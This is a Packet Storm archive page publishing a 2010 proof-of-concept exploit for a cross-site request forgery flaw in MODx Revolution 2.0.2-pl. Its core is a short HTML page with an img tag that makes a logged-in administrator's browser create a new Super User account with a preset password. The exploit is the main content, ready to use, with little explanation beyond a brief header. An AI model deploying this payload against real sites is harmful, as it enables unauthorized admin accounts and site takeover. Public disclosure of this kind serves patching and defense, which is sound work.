what you don't know can hurt you

MODx Revolution 2.0.2-pl Cross Site Request Forgery

MODx Revolution 2.0.2-pl Cross Site Request Forgery
Posted Sep 29, 2010
Authored by AutoSec Tools

MODx Revolution version 2.0.2-pl suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
MD5 | 6be8e51c603e53902fb293bb82c94a2c

MODx Revolution 2.0.2-pl Cross Site Request Forgery

Change Mirror Download
<!------------------------------------------------------------------------
# Software................MODx Revolution 2.0.2-pl
# Vulnerability...........Cross-site Request Forgery
# Download................http://modxcms.com
# Release Date............9/28/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in MODx Revolution 2.0.2-pl
# can be exploited to create a new admin.
#
#
# --PoC-->

<html>
<body>
<img src="http://localhost/modx/connectors/security/user.php?action=create&modx-ab-stay=&groups=%5B%7B%22usergroup%22%3A%221%22%2C%22role%22%3A%222%22%2C%22member%22%3A%22%22%2C%22rolename%22%3A%22Super%20User%22%2C%22name%22%3A%22Administrator%22%2C%22menu%22%3Anull%7D%5D&extended=%7B%7D&HTTP_MODAUTH=modx4ca298fc3d92e9.21874888&id=0&newpassword=false&modx-user-fs-newpassword-checkbox=on&passwordnotifymethod=s&passwordgenmethod=spec&specifiedpassword=Password1&confirmpassword=Password1&username=new_admin&active=1&fullname=&email=x%40x.com&phone=&mobilephone=&address=&city=&fax=&state=&zip=&country=&website=&dob=&gender=&comment=&failedlogincount=&blockeduntil=&blockedafter=&extended_name=&extended_value=&extended_id=" />
</body>
</html>
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close